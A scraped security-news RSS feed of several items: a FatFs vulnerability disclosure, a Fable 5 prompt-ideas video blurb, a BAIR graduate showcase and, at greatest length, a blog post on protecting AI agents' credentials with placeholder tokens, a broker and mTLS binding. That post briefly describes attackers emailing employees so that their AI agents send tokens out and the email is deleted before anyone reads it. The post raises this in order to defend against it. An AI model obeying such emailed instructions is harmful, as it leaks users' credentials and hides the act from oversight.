<title><![CDATA[Persistent: Deutscher Software-Dienstleister Nagarro vor Übernahme aus Indien - Golem.de]]></title>
<description><![CDATA[... Security Incident Manager (TÜV). Seminar: Security Incident Manager (TÜV) · zum Kurs. IT Sicherheitstests und Ethical Hacking mit Kali Linux (E ...]]></description>
<link>https://tsecurity.de/de/3644850/it-security-nachrichten/persistent-deutscher-software-dienstleister-nagarro-vor-uebernahme-aus-indien-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644850/it-security-nachrichten/persistent-deutscher-software-dienstleister-nagarro-vor-uebernahme-aus-indien-golemde/</guid>
<pubDate>Sat, 04 Jul 2026 07:53:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... <b>Security</b> Incident Manager (TÜV). Seminar: <b>Security</b> Incident Manager (TÜV) · zum Kurs. <b>IT</b> Sicherheitstests und Ethical Hacking mit Kali Linux (E ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Unpatched Flaws Disclosed in Filesystem Bundled Into Millions of Embedded Devices]]></title>
<description><![CDATA[Security firm runZero has disclosed seven vulnerabilities in FatFs, a small filesystem library that lets a device read and write the FAT and exFAT formats used on USB drives and SD cards.

The flaws matter because FatFs is nearly everywhere. It ships inside the firmware that runs security cameras...]]></description>
<link>https://tsecurity.de/de/3644442/it-security-nachrichten/unpatched-flaws-disclosed-in-filesystem-bundled-into-millions-of-embedded-devices/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644442/it-security-nachrichten/unpatched-flaws-disclosed-in-filesystem-bundled-into-millions-of-embedded-devices/</guid>
<pubDate>Fri, 03 Jul 2026 23:37:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security firm runZero has disclosed seven vulnerabilities in FatFs, a small filesystem library that lets a device read and write the FAT and exFAT formats used on USB drives and SD cards.

The flaws matter because FatFs is nearly everywhere. It ships inside the firmware that runs security cameras, drones, industrial controllers, hardware crypto wallets, and other devices built on]]></content:encoded>
</item>
<item>
<title><![CDATA[Unpatched Flaws Disclosed in Filesystem Bundled Into Millions of Embedded Devices]]></title>
<description><![CDATA[Security firm runZero has disclosed seven vulnerabilities in FatFs, a small filesystem library that lets a device read and write the FAT and exFAT formats used on USB drives and SD cards. The flaws matter because FatFs is nearly everywhere. It ships inside…
Read more →
The post Unpatched Flaws Di...]]></description>
<link>https://tsecurity.de/de/3644440/it-security-nachrichten/unpatched-flaws-disclosed-in-filesystem-bundled-into-millions-of-embedded-devices/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644440/it-security-nachrichten/unpatched-flaws-disclosed-in-filesystem-bundled-into-millions-of-embedded-devices/</guid>
<pubDate>Fri, 03 Jul 2026 23:37:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Security firm runZero has disclosed seven vulnerabilities in FatFs, a small filesystem library that lets a device read and write the FAT and exFAT formats used on USB drives and SD cards. The flaws matter because FatFs is nearly everywhere. It ships inside…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/unpatched-flaws-disclosed-in-filesystem-bundled-into-millions-of-embedded-devices/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/unpatched-flaws-disclosed-in-filesystem-bundled-into-millions-of-embedded-devices/">Unpatched Flaws Disclosed in Filesystem Bundled Into Millions of Embedded Devices</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[July Movie Nights With 7 of the Best A24 Movies You Can Stream Free]]></title>
<description><![CDATA[A new batch of A24 films, including Everything Everywhere All At Once and Lady Bird, arrives this July on free streaming services.]]></description>
<link>https://tsecurity.de/de/3643744/it-nachrichten/july-movie-nights-with-7-of-the-best-a24-movies-you-can-stream-free/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643744/it-nachrichten/july-movie-nights-with-7-of-the-best-a24-movies-you-can-stream-free/</guid>
<pubDate>Fri, 03 Jul 2026 16:02:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A new batch of A24 films, including Everything Everywhere All At Once and Lady Bird, arrives this July on free streaming services.]]></content:encoded>
</item>
<item>
<title><![CDATA[Securing agentic identity]]></title>
<description><![CDATA[As is the case for many people working in the security industry, the last
few months of my life have been focused on dealing with people wanting to
use LLMs everywhere. From an enterprise security perspective that’s not an
inherent problem - what’s more of a problem is that people want those agen...]]></description>
<link>https://tsecurity.de/de/3642515/downloads/securing-agentic-identity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642515/downloads/securing-agentic-identity/</guid>
<pubDate>Fri, 03 Jul 2026 02:45:52 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>As is the case for many people working in the security industry, the last
few months of my life have been focused on dealing with people wanting to
use LLMs everywhere. From an enterprise security perspective that’s not an
inherent problem - what’s more of a problem is that people want those agents
to have access to resources like their calendar and email and so on, and now
we have somewhat non-deterministic agents that seem very enthusiastic to
achieve what you asked whether that’s a good idea or not, and we’re
combining this with credentials that give them access to sensitive data, and
leaving those credentials on disk where they can be committed into git repos
or exfiltrated to some other service to make use of them on the agent’s
behalf or well just any other number of things, at which point your CEO’s
email is suddenly readable by everyone and you’re having a bad day.</p>
<p>As I mentioned in my <a class="link" href="https://codon.org.uk/~mjg59/blog/p/preventing-token-theft/" target="_blank" rel="noopener">last
post</a>, pretty
much every strong mechanism for keeping credentials in place is just not
supported in the wider world. We can imagine a universe where agents use
hardware (or at least hypervisor) backed certificates to obtain credentials
and any that end up leaking are worthless as a result. But, sadly, that’s
not an option for most people using existing identity providers. The state
of the art is that you use the <a class="link" href="https://mjg59.dreamwidth.org/62175.html" target="_blank" rel="noopener">device code
flow</a> and a human authenticates and
the token ends up back inside the agent environment and then it proceeds to
do whatever it wants with it and you just hope that you wake up the next
morning without an awful infoleak occurring.</p>
<p>(An aside: I do not like the device code flow as used in enterprise
environments, and I never will. The identity provider doesn’t have a real
opportuity to inspect the security posture of the system asking for the
token, and as a result some identity providers will restrict tokens that are
issued in this way. The common alternative of doing stuff using a more
standard flow and having a redirect URI pointing at localhost works fine for
local systems and is a pain for remote ones, even if you can commit crimes
with SSH forwarding. I’m going to suggest something that I think is better,
and you are free to disagree)</p>
<p>I’m not in a position to get every identity provider and service provider to
change their security posture, so I’m somewhat stuck in terms of the tokens
they’re willing to issue me - largely either JWTs or opaque access tokens,
with no support for any mechanism of binding that token to an instance. The
token that’s going to have to be provided to the remote service is something
I have little influence over. But that doesn’t mean I can’t influence the
token that lands inside the agent’s environment. I can issue a placeholder
token to the agent, and force it to communicate via a proxy that swaps out
the placeholder for the real thing. The worst the agent can do is exfiltrate
the placeholder token, and as long as malicious actors don’t have access to
that proxy, it doesn’t matter - nobody else can do anything with the
placeholder.</p>
<p>This isn’t a terribly novel insight, and it seems like almost everybody has
reinvented this on their own. But a lot of these implementations involve you
somehow obtaining the real token in advance and then pasting that into
something that generates a placeholder that you provide to your agent
environment somehow, and it’s all a bit clunky and awkward, and it also
means that you need to deal with something that keeps track of the mapping
between placeholders and real tokens and oh no we’ve just invented a secret
store, and if you want this to work at scale and reliably you’re just
invented a high availability distributed secret store, and a lot of people
who’ve read that are now shaking their heads and reaching for gin. Can we
simplify this, and improve security at the same time? I think we can!</p>
<p>Remember when I said “as long as malicious actors don’t have access to that
proxy, it doesn’t matter”? What if they do? What if they compromise one
machine inside your environment and are then able to email a bunch of
employees and convince their agents to send more tokens back to them and
then delete the email before a human reads it? Now you have someone inside
the wall with access to those tokens, and presumably with access to the
proxy, and now they can be anyone whose agent was gullible enough to think
sending them a token was a good idea. This isn’t good!</p>
<p>So, I thought for a while, and I came up with a new idea. We can have a
broker service that obtains credentials for us. We can run that centrally,
away from the agents. A client in an agentic environment can request a
token, and that can result in a URL being generated and the user being
directed to open a URL in a browser and authenticate. When the user
authenticates, the authentication flow redirects the confirmation back via
the broker, and the broker obtains the real auth token. The obvious thing to
do now would be to return the auth token to the client in the agentic
environment, but we don’t do that. Instead, we mint a new JWT, and add a new
claim - one that contains an encrypted copy of the token. In the process we
can copy over all the original claims, because those aren’t secret - and now
even if the client inspects the token to figure out what access it has,
it’ll get a correct answer. We sign the new token with our own signing key,
and pass that back to the client. The client now has a legitimate JWT that
is utterly useless, because the signature isn’t trusted by anyone other than
us.</p>
<p>How does it use it? It makes an API request via a proxy, including the new
token in the Authorization: header. The proxy verifies the signature on the
token, and then decrypts the original token and swaps out the fake token for
the real one. The remote API sees what it expects, and everyone is
happy. There’s never a real token in the agentic environment, but also we
don’t need to store anyting anywhere. The only state is the encryption keys,
and those can be injected into the environment at startup. You need to
scale? Just start more of these processes. You need to support multiple
availability zones? Just start more of these processes in different
places. No persistent data is ever held in the broker or the proxy. You
don’t need to care about distributed databases or secret stores.</p>
<p>This felt wonderfully elegant and I felt smug about coming up with a better
idea, and then I went to a bar earlier this week and sat down to read <a class="link" href="https://datatracker.ietf.org/doc/html/rfc8705" target="_blank" rel="noopener">RFC
8705</a> and the guy next to me
saw that over my shoulder and asked what I was reading and I explained why I
was interested and we talked about agentic identity and then he mentioned
that fly.io had something that sounded <a class="link" href="https://fly.io/blog/tokenized-tokens/" target="_blank" rel="noopener">very
similar</a> and I read that and gosh yes
it is very similar, so damn you fly.io for stealing my ideas 3 years before
I even had them. Anyway. Now I need to do better.</p>
<p>Remember that there’s still a risk around anyone who has access to the proxy
having access to the encrypted keys? We can remove that risk as well. It’s
not uncommon for agentic environments to have an identity issued via
something like <a class="link" href="https://spiffe.io/" target="_blank" rel="noopener">SPIFFE</a>, at which point they have a
client certificate. You can probably guess where I’m going with this. If we
require that an agent present a client cert to the broker when requesting a
token, we can embed a representation of that client cert into the token we
mint. The proxy can then require mTLS for the client connection, and can
verify that the presented certificate matches the one represented in the
token. If it does then whoever’s using the token has access to the private
key associated with the environment it was issued to. If we then ensure that
the private keys backing these certificates are either hardware or
hypervisor backed, and as such tied to a specific instance, we now have a
high degree of confidence that the token can only be used in its intended
environment. Even if our identity provider doesn’t support RFC 8705, we can.</p>
<p>This is fairly straightforward where you’re using a platform where your
identity provider is also the environment that’s consuming your tokens, and
more annoying for third parties. The broker potentially needs some amount of
third party vendor knowledge to make that work for everyone. This is even
more the case where login isn’t via your identity provider (thanks, github),
but none of this is insurmountable - just annoying. And where vendors issue
opaque tokens rather than JWTs, this still isn’t a problem; we can just mint
a new JWT that includes the opaque token as an encrypted claim, and include
the same certificate binding. The opaque token ends up being the thing
that’s presented to the third party, but only after we’ve verified the mTLS
binding.</p>
<p>In an ideal world none of this would be necessary - someone would spin up a
new agentic environment, a user would prove their identity, and a
certificate embodying that identity would be issued to the environment with
a private key that can’t be exfiltrated. That certificate would be
sufficient to obtain new certificates associated with the same private key,
and we could still bind that into mTLS identity. This would be much simpler,
but browsers don’t support it, so it’s not likely to happen any time soon.</p>
<p>Anyway. Even if we can’t have the best thing, we can do better than we are
at the moment, and also it would be lovely if we could standardise on this
rather than have everyone build their own thing. The end.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[the most powerful AI is back for 7 days (here's what to ask it)]]></title>
<description><![CDATA[Author: NetworkChuck - Bewertung: 131x - Views:1464 Fable 5 — the most powerful AI on earth — got pulled offline by the U.S. government three days after it launched, and it just came back. But for most of us the free window is only a handful of days (through July 7). So I sat down with Daniel Mie...]]></description>
<link>https://tsecurity.de/de/3642213/it-security-video/the-most-powerful-ai-is-back-for-7-days-heres-what-to-ask-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642213/it-security-video/the-most-powerful-ai-is-back-for-7-days-heres-what-to-ask-it/</guid>
<pubDate>Thu, 02 Jul 2026 22:33:34 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: NetworkChuck - Bewertung: 131x - Views:1464 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/YC77Lb_cN6c?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Fable 5 — the most powerful AI on earth — got pulled offline by the U.S. government three days after it launched, and it just came back. But for most of us the free window is only a handful of days (through July 7). So I sat down with Daniel Miessler, who's already living inside that window, to figure out the one thing that actually matters: what's worth asking it before it's gone.<br />
<br />
This isn't about doing bigger tasks. It's about pointing maximum intelligence at your deepest systems — your AI harness, the security of everything you've shipped, and the single hardest question about what you're actually building toward — so the payoff outlasts the window. Think of it like a super-intelligent alien that can only help for a week: you don't send it on errands, you have it rebuild your roads.<br />
<br />
In this video, you'll learn Daniel Miessler's exact list of meta-prompts to run on Fable 5: how to improve the harness that governs all your AI, how to audit the full attack surface of everything you've deployed, and how to ask the model to tell you what you're really shooting at. Whether you're deep into AI already or just trying not to waste the most capable model on earth, this is the prompt playbook for the week Fable is back.<br />
<br />
Join the NetworkChuck Academy!: https://ntck.co/NCAcademy<br />
<br />
RESOURCES / LINKS:<br />
🌐 Daniel's write-up — 10 Prompts to Run When Fable Comes Back: https://danielmiessler.com/blog/prompts-to-run-when-fable-comes-back<br />
🌐 Daniel's "too smart for humans" project: https://eternalquestions.ai<br />
👤 Daniel Miessler: https://danielmiessler.com<br />
📖 Anthropic Fable 5 redeploy announcement: https://www.anthropic.com/news<br />
<br />
TIMESTAMPS:<br />
0:00 - Fable 5 is back, and you only have 6 days<br />
0:24 - Why the government pulled Fable 5 offline<br />
0:39 - Calling Daniel Miessler for the right prompts<br />
1:04 - What changes after July 7 (the 50% usage cap)<br />
1:33 - The one-question test: what would you ask a super-intelligent alien?<br />
1:59 - Prompt 1: Optimize your harness (your deepest system)<br />
2:51 - Prompt 2: Security and prompt injection handling<br />
3:22 - Prompt 3: Audit everything you've deployed (attack surface management)<br />
3:50 - Prompt 4: The self-model audit — what are you actually shooting at?<br />
5:16 - Which of your skills is about to 10x (and which dies)<br />
5:43 - How to write these prompts yourself (walk and talk)<br />
6:47 - Answering questions too hard for humans (eternalquestions.ai)<br />
7:13 - The alien architects: doing work that outlasts the window<br />
7:51 - What would YOU ask Fable 5?<br />
<br />
FEATURING:<br />
👤 Daniel Miessler (Security researcher, writer, creator of Fabric): https://x.com/DanielMiessler<br />
   Website: https://danielmiessler.com<br />
<br />
SUPPORT NETWORKCHUCK:<br />
☕☕ COFFEE and MERCH: https://ntck.co/coffee<br />
<br />
READY TO LEARN??<br />
🔥🔥Join the NetworkChuck Academy!: https://ntck.co/NCAcademy<br />
📚 CCNA Course: https://ntck.co/ccna<br />
<br />
FOLLOW ME EVERYWHERE:<br />
Instagram: https://www.instagram.com/networkchuck/<br />
X/Twitter: https://x.com/networkchuck<br />
Facebook: https://www.facebook.com/NetworkChuck/<br />
Join the Discord server: https://ntck.co/discord<br />
<br />
Some links in this description are affiliate links. If you buy through them, I may earn a small commission at no extra cost to you.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Install Kali Linux on VirtualBox (Step by Step 2026)]]></title>
<description><![CDATA[By HOC Team  |  Last updated: June 2026  | Read time: ~20 min Kali Linux is the most… The post How to Install Kali Linux on VirtualBox (Step by Step 2026) appeared first on Hackers Online Club. This article has…
Read more →
The post How to Install Kali Linux on VirtualBox (Step by Step 2026) appe...]]></description>
<link>https://tsecurity.de/de/3641848/it-security-nachrichten/how-to-install-kali-linux-on-virtualbox-step-by-step-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641848/it-security-nachrichten/how-to-install-kali-linux-on-virtualbox-step-by-step-2026/</guid>
<pubDate>Thu, 02 Jul 2026 19:09:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>By HOC Team  |  Last updated: June 2026  | Read time: ~20 min Kali Linux is the most… The post How to Install Kali Linux on VirtualBox (Step by Step 2026) appeared first on Hackers Online Club. This article has…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/how-to-install-kali-linux-on-virtualbox-step-by-step-2026/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/how-to-install-kali-linux-on-virtualbox-step-by-step-2026/">How to Install Kali Linux on VirtualBox (Step by Step 2026)</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Install Kali Linux on VirtualBox (Step by Step 2026)]]></title>
<description><![CDATA[By HOC Team  |  Last updated: June 2026  | Read time: ~20 min Kali Linux is the most…
The post How to Install Kali Linux on VirtualBox (Step by Step 2026) appeared first on Hackers Online Club.]]></description>
<link>https://tsecurity.de/de/3641796/it-security-nachrichten/how-to-install-kali-linux-on-virtualbox-step-by-step-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641796/it-security-nachrichten/how-to-install-kali-linux-on-virtualbox-step-by-step-2026/</guid>
<pubDate>Thu, 02 Jul 2026 18:51:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>By HOC Team  |  Last updated: June 2026  | Read time: ~20 min Kali Linux is the most…</p>
<p>The post <a href="https://hackersonlineclub.com/install-kali-linux-virtualbox/">How to Install Kali Linux on VirtualBox (Step by Step 2026)</a> appeared first on <a href="https://hackersonlineclub.com/">Hackers Online Club</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Best Data Removal Services of 2026: Reduce Your Online Presence]]></title>
<description><![CDATA[Data brokers and people-finder sites are everywhere, but the top data removal services could help you clean up your online footprint.]]></description>
<link>https://tsecurity.de/de/3641234/it-nachrichten/best-data-removal-services-of-2026-reduce-your-online-presence/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641234/it-nachrichten/best-data-removal-services-of-2026-reduce-your-online-presence/</guid>
<pubDate>Thu, 02 Jul 2026 15:03:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Data brokers and people-finder sites are everywhere, but the top data removal services could help you clean up your online footprint.]]></content:encoded>
</item>
<item>
<title><![CDATA[RealOrRender: Fraunhofer IOSB erkennt Deepfakes hybrid - Golem.de]]></title>
<description><![CDATA[E-Learning: IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning) · zum Kurs. IT-Security-Awareness für Systemadministratoren: ...]]></description>
<link>https://tsecurity.de/de/3640012/it-security-nachrichten/realorrender-fraunhofer-iosb-erkennt-deepfakes-hybrid-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640012/it-security-nachrichten/realorrender-fraunhofer-iosb-erkennt-deepfakes-hybrid-golemde/</guid>
<pubDate>Thu, 02 Jul 2026 04:07:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[E-Learning: IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning) · zum Kurs. <b>IT</b>-<b>Security</b>-Awareness für Systemadministratoren: ...]]></content:encoded>
</item>
<item>
<title><![CDATA[2026 BAIR Graduate Showcase]]></title>
<description><![CDATA[Congratulations to the Berkeley Artificial Intelligence Research (BAIR) Lab class of 2026! This year, BAIR celebrates another remarkable group of Ph.D. graduates whose curiosity, creativity, and perseverance have pushed the frontiers of artificial intelligence and machine learning.

Their work sp...]]></description>
<link>https://tsecurity.de/de/3639545/ai-nachrichten/2026-bair-graduate-showcase/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639545/ai-nachrichten/2026-bair-graduate-showcase/</guid>
<pubDate>Wed, 01 Jul 2026 21:33:50 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- twitter -->










<p>Congratulations to the Berkeley Artificial Intelligence Research (BAIR) Lab class of 2026! This year, BAIR celebrates another remarkable group of Ph.D. graduates whose curiosity, creativity, and perseverance have pushed the frontiers of artificial intelligence and machine learning.</p>

<p>Their work spans the breadth of modern AI — robotics and embodied intelligence, large language models and reasoning, computer vision, generative modeling, AI safety, human-AI interaction, AI for science and healthcare, and much more. Along the way, they have published influential research, built systems with real-world impact, mentored their peers, and shaped the BAIR community for the better.</p>

<p>Now they are headed everywhere ideas travel: to faculty and postdoctoral positions, to industry research labs, and to startups of their own founding — and several are still exploring what comes next and would love to hear from you.</p>

<p>Please join us in celebrating the achievements of these wonderful graduates. We are proud of everything they have accomplished at Berkeley, and we can’t wait to see what they do next!</p>

<!--more-->

<p><small><i>Thank you to our friends at the <a href="https://ai.stanford.edu/blog/sail-graduates/">Stanford AI Lab</a> for this idea!</i></small></p>

<hr>

<div class="container">
  <div class="row">
    
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://bfshi.github.io/"><img src="https://bair.berkeley.edu/static/blog/grads2026/baifeng-shi.jpg" alt="Baifeng Shi" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Baifeng Shi</h1><br>
              <strong>Email:</strong><a href="mailto:baifeng_shi@berkeley.edu"> baifeng_shi@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://bfshi.github.io/">https://bfshi.github.io/</a><br>
              
              <strong>Advisor(s):</strong> Trevor Darrell<br>
              
              <strong>Research Blurb:</strong> I work on building generalist vision and robotic models.<br>
              
              
              <strong>What's next:</strong> Member of Technical Staff at Physical Intelligence
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://sea-snell.github.io/"><img src="https://bair.berkeley.edu/static/blog/grads2026/charlie-snell.jpg" alt="Charlie Snell" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Charlie Snell</h1><br>
              <strong>Email:</strong><a href="mailto:csnell22@berkeley.edu"> csnell22@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://sea-snell.github.io/">https://sea-snell.github.io</a><br>
              
              <strong>Advisor(s):</strong> Dan Klein<br>
              
              <strong>Research Blurb:</strong> My work aims to understand when and how the different LLM scaling paradigms can be traded off and interchanged. In particular, test-time scaling treats each prompt independently, drawing long chains of inferences and then forgetting them entirely between prompts. This differs critically from pretraining, which instead learns a compressed representation from a large dataset. I believe bridging the gap between these methods of scaling computation, presents a key open challenge in the field: how can we develop methods which turn the inferences drawn at test-time back into learned representations that the model can hold onto across interactions.<br>
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://devinguillory.com/"><img src="https://bair.berkeley.edu/static/blog/grads2026/devin-guillory.jpg" alt="Devin Guillory" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Devin Guillory</h1><br>
              <strong>Email:</strong><a href="mailto:dguillory@berkeley.edu"> dguillory@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://devinguillory.com/">https://devinguillory.com</a><br>
              
              <strong>Advisor(s):</strong> Trevor Darrell<br>
              
              <strong>Research Blurb:</strong> Accounting for data shifts in computer vision models<br>
              
              
              <strong>What's next:</strong> Building collaborative AI systems, looking for conspirators.
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://efleisig.com/"><img src="https://bair.berkeley.edu/static/blog/grads2026/eve-fleisig.jpg" alt="Eve Fleisig" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Eve Fleisig</h1><br>
              <strong>Email:</strong><a href="mailto:efleisig@berkeley.edu"> efleisig@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://efleisig.com/">https://efleisig.com</a><br>
              
              <strong>Advisor(s):</strong> Dan Klein<br>
              
              <strong>Research Blurb:</strong> I design language models to work reliably and fairly for the broad range of real LLM users. First, my research leverages disagreement among user preferences as signal, in order to train and evaluate LLMs for entire populations of users. Second, I work on designing rigorous evaluations to extricate challenging LLM harms that diverse users face. Finally, I work on core technical failures of LLMs, like miscalibrated confidence, to reduce downstream risks when models are deployed to users with different needs. Combined, these interventions facilitate building LLMs that minimize societal harms, and maximize benefits to a wider range of real-world users.<br>
              
              
              <strong>What's next:</strong> Postdoctoral fellow at Princeton CITP
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://graceluo.net/"><img src="https://bair.berkeley.edu/static/blog/grads2026/grace-luo.jpg" alt="Grace Luo" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Grace Luo</h1><br>
              <strong>Email:</strong><a href="mailto:graceluo@berkeley.edu"> graceluo@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://graceluo.net/">https://graceluo.net</a><br>
              
              <strong>Advisor(s):</strong> Trevor Darrell<br>
              
              <strong>Research Blurb:</strong> My research is on interpreting and controlling generative models. For example, I've worked on re-purposing image generators for computer vision tasks, and meta-modeling language activations for better LLM probing and steering.<br>
              
              
              <strong>What's next:</strong> Research scientist in industry
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://hanlinzhu.com/"><img src="https://bair.berkeley.edu/static/blog/grads2026/hanlin-zhu.jpg" alt="Hanlin Zhu" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Hanlin Zhu</h1><br>
              <strong>Email:</strong><a href="mailto:hanlinzhu@berkeley.edu"> hanlinzhu@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://hanlinzhu.com/">https://hanlinzhu.com/</a><br>
              
              <strong>Advisor(s):</strong> Stuart Russell, Jiantao Jiao<br>
              
              <strong>Research Blurb:</strong> My research centers on understanding and improving the reasoning capabilities of large language models (LLMs).<br>
              
              
              <strong>What's next:</strong> Member of Technical Staff at OpenAI
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://haozhi.io/"><img src="https://bair.berkeley.edu/static/blog/grads2026/haozhi-qi.jpg" alt="Haozhi Qi" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Haozhi Qi</h1><br>
              <strong>Email:</strong><a href="mailto:hqi@berkeley.edu"> hqi@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://haozhi.io/">https://haozhi.io/</a><br>
              
              <strong>Advisor(s):</strong> Jitendra Malik, Yi Ma<br>
              
              <strong>Research Blurb:</strong> Dexterous Manipulation and Robot Learning<br>
              
              
              <strong>What's next:</strong> Research scientist at Amazon; Faculty at University of Chicago
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://zamfi.net/"><img src="https://bair.berkeley.edu/static/blog/grads2026/j-d-zamfirescu-pereira.jpg" alt="J.D. Zamfirescu-Pereira" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>J.D. Zamfirescu-Pereira</h1><br>
              <strong>Email:</strong><a href="mailto:zamfi@berkeley.edu"> zamfi@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://zamfi.net/">https://zamfi.net</a><br>
              
              <strong>Advisor(s):</strong> Bjoern Hartmann<br>
              
              <strong>Research Blurb:</strong> My research focuses on effective human-AI co-design. I study the boundaries of language interfaces as a medium for interacting with AI, creating systems that blend language-focused interactions with structured user interfaces that draw on different levels of abstraction. I focus on language-oriented technologies, like LLMs and text-to-image models, that are powerful mediators of design processes. These technologies enable humans to describe their desires at almost any level of abstraction, from high-level goals vaguely specified (“I’d like a game to help my kid learn to read”) to low-level corrections of undesired outputs (“Don’t say ‘I know because I’ve tasted it’ when about a recipe substitution's taste”).<br>
              
              
              <strong>What's next:</strong> Assistant Professor, Computer Science, UCLA
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://jlian2.github.io/"><img src="https://bair.berkeley.edu/static/blog/grads2026/jiachen-lian.jpg" alt="Jiachen Lian" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Jiachen Lian</h1><br>
              <strong>Email:</strong><a href="mailto:jiachenlian@berkeley.edu"> jiachenlian@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://jlian2.github.io/">https://jlian2.github.io</a><br>
              
              <strong>Advisor(s):</strong> Gopala Anumanchipalli<br>
              
              <strong>Research Blurb:</strong> My research focuses on human-centered AI across speech, healthcare, and systems.<br>
              
              
              <strong>Looking for:</strong> Look for AI talents to join our startup
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://joshuaminwookang.github.io/"><img src="https://bair.berkeley.edu/static/blog/grads2026/josh-kang.jpg" alt="Josh Kang" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Josh Kang</h1><br>
              <strong>Email:</strong><a href="mailto:minwoo_kang@berkeley.edu"> minwoo_kang@berkeley.edu</a><br>
